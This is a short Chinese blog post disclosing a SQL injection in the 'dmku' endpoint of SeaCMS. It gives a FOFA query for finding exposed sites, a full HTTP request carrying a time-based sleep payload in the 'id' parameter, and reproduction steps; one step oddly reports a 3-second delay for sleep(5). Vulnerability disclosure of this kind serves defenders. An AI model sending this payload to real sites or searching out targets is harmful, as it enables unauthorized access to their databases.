漏洞描述
SeaCMS海洋影视管理系统的'dmku'接口存在SQL注入漏洞,攻击者可以通过发送特制的HTTP请求,在未经授权的情况下向数据库注入恶意SQL代码,从而执行任意SQL语句。该漏洞利用了应用程序在处理GET请求参数时,没有对'id'参数进行充分的验证和过滤,导致可以通过改参数注入SQL代码
fofa
app="海洋CMS"
POC
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(3)))v)&type=list HTTP/1.1
Host: xxx.xxx.xxx.xxx
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
漏洞复现
在fofa中搜索资产,共有4777条数据匹配
访问目标网站抓包构造恶意SQL语句
使用sleep(5)函数判断,存在3秒延时
使用sleep(10)判断,存在10秒延时
标签:dmku,xxx,漏洞,sleep,SQL,SeaCMS From: https://www.cnblogs.com/LeouMaster/p/18214030